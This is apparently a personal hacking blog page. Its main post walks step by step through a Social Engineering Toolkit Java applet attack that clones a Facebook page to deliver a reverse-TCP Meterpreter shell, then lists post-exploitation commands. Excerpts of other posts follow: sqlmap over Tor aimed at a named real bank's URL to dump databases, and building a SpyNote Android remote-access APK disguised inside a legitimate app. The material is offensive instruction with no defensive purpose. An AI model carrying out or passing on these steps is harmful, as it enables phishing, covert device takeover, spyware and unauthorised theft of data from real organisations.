Social Engineering Toolkit

Java Applet Attack(using SET)

Step 1:

Start the SET(Social Engg. Toolkit) and select option 1

Step 2:

Now select option number 2

Step 3:

Now select "java applet attack method"

Step 4:

Select website template. If you want to copy any website, you can use the second option also.

Step 5:

Now provide your local IP address. If you are conducting the attack on WAN you must do port forwarding first and provide your public IP instead.

Step 6:

I have selected Website template option so I'm having a list of built in templates. Choose any of the following...I have selected facebook

Then select the Payload that you want to be executed:

Windows Reverse_TCP Meterpreter

Step 7:

Select the Encryption type and Set the PORT number and press Return:

Step 8:

Startup the Victim PC : Windows 7 ultimate 64 bit

Browser : Google Chrome Updated

Java : Latest Version(Version 7 Update 45)

Now type Attacker's IP on which the server is running in the URL bar.

Wait for the handler running on Kali to get the meterpreter sessio

Step 9:

Type sessions -i <Session ID>

We are now inside meterpreter, now just use post exploitation commands Like:

sysinfo

shell

getprivs

shutdown.....etc

Comments

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=...

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device Windows 10 SpyNote Java STEP 1: Download and Execute SpyNote (spynote.us is taken down by Department of Homeland Security) DOWNLOAD STEP 2: Provide the Port number and Java path if asked or leave everything as default. STEP 3: Navigate to Tools menu and select Payload. Fill in the reverse IP and other app details. Here in this step you can configure the properties of the Payload If you plan to merge this payload with any legit application then browse that application here. STEP 4: Now click on build, it will trigger apktool and the apk will be created . STEP 5: Now copy the apk file to the android device using any medium like file sharing websites (mega.nz) STEP 6: Install the apk in the android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your co...

NMAP - NSE Scripts (Advanced)

Vulnerability scanning using NSE in Nmap. Note: I have written this tutorial taking the fact into consideration that the user is well versed with basic NMAP commands. For basic NMAP commands please refer the cheat-sheet given below: Basic Scanning Techniques • Scan a single target : nmap [target] • Scan multiple targets: nmap [target1,target2,etc] • Scan a list of targets ...

Krishna Sharma

Search This Blog